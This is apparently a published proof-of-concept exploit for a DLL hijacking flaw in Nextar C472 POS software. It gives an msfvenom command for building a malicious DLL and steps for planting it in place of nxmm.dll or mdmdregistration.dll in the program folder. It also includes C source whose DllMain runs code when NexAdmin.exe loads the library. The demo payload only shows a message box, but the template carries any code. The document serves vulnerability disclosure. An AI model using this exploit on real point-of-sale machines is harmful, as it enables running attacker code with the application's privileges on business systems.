Authored by Yehia Elghaly

Nextar C472 POS suffers from a dll hijacking vulnerability.

/* 
Description:
A vulnerability exists in windows that allows other applications dynamic link libraries
to execute malicious code without the users consent, in the privelage context of the targeted application.

Exploit Title: Nextar C472 POS DLL Hijacking Exploit (nxmm.dll - mdmdregistration.dll)
Date: 28/11/2021
Author: Yehia Elghaly
Vendor: https://www.nextar.com/
Software: https://download.nextar.com/latest/setup_nex_en.exe
Version: Latest Nextar C472 POS
Tested on: Windows 7 Pro x86 - Windows 10 x64
Vulnerable extensions: .htm .html
*/

/*
Instructions:

1. Create dll using msfvenom (sudo msfvenom --platform windows -p windows/messagebox TEXT="Nex POS Hacked - YME" -f dll > nxmm.dll) or compile the code
2. Replace nxmm.dll - mdmdregistration.dll or shcore.dll in Nex directory C:Nex with your newly dll
3. Launch NexAdmin.exe
4. PoP UP MessageBox!
*/


#include <windows.h>

BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{

switch (fdwReason)
{
case DLL_PROCESS_ATTACH:
dll_mll();
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}

return TRUE;
}

int dll_mll()
{
MessageBox(0, "Nex POS Hacked!", "YME", MB_OK);
}